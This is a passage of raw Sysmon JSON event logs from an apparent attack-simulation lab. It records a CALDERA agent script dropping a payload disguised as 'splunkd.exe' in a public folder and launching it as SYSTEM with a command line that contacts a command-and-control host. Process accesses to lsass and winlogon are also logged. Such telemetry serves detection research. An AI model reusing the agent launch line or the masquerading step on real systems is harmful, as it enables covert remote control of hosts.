C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:49:05.474\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\splunkd.exe\r\nCreationUtcTime: 2020-08-01 06:48:00.938","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:49:05.474","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\splunkd.exe","CreationUtcTime":"2020-08-01 06:48:00.938","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.981\r\nProcessGuid: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nProcessId: 2308\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545\r\nParentProcessGuid: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nParentProcessId: 2116\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.981","ProcessGuid":"{E2A3D6B1-1061-5F25-0000-001069980200}","Image":"C:\\Users\\Public\\splunkd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545","ParentProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","ParentProcessId":"2116","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:06.037\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: 缘Ť\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:06.037","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"缘Ť","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:06.037\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:06.037","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:06.037\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1062-5F25-0000-001018990200}\r\nTargetProcessId: 2444\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:06.037","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1062-5F25-0000-001018990200}","TargetProcessId":"2444","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:06.037\r\nSourceProcessGUID: {E2A3D6B1-1062-5F25-0000-001018990200}\r\nSourceProcessId: 2444\r\nSourceThreadId: 2292\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:06.037","SourceProcessGUID":"{E2A3D6B1-1062-5F25-0000-001018990200}","SourceProcessId":"2444","SourceThreadId":"2292","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:07.490\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:07.490","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:07.490\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1992\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 